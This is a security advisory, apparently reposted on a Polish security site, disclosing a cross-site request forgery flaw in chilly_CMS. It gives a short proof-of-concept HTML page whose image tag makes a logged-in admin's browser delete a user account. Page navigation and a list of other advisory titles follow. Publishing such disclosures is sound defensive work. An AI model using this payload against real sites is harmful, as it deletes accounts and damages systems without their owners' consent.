Chilly CMS cross site request forgery vulnerability

Tekst :

=======================================================================

chilly_CMS CSRF
Vulnerability

=======================================================================

# Vulnerability found in- Admin module

# email Pratulag@yahoo.com

# company aksitservices

# Credit by Pratul Agrawal

# Software chilly_CMS

# Category CMS / Portals

# Site p4ge
http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php

# Plateform php

# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web
Team)

# Proof of concept #

Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS

Script to Delete the Admin user through Cross Site request forgery

.
...........................................................................
.....................................

<html>

<body>

<img
src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?acti
on=deleteuser&id=[user ID] />

</body>

</html>

.
...........................................................................
.......................................

After execution refresh the page and u can see that a added content is
deleted automatically.

#If you have any questions, comments, or concerns, feel free to contact
me.

Bezpieczeństwo informacji

Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

Baza WLB

Dodaj Note WLB

O WLB

Informacje

Harmonogram

Cena

Referencje

Kontakt

Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

Kontakt

Informacje o firmie

Apache HTTP Server Denial
of Service Vulnerability

Multiple Vendors
libc/fnmatch(3) DoS (incl
apache poc)

Apache Continuum
cross-site scripting
vulnerability

Apache Tomcat DoS
Vulnerability

PHP Hashtables Denial of
Service

PHP 5.3.6 multiple null
pointer dereference

PHP 5.3.6 ZipArchive
invalid use glob(3)

libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)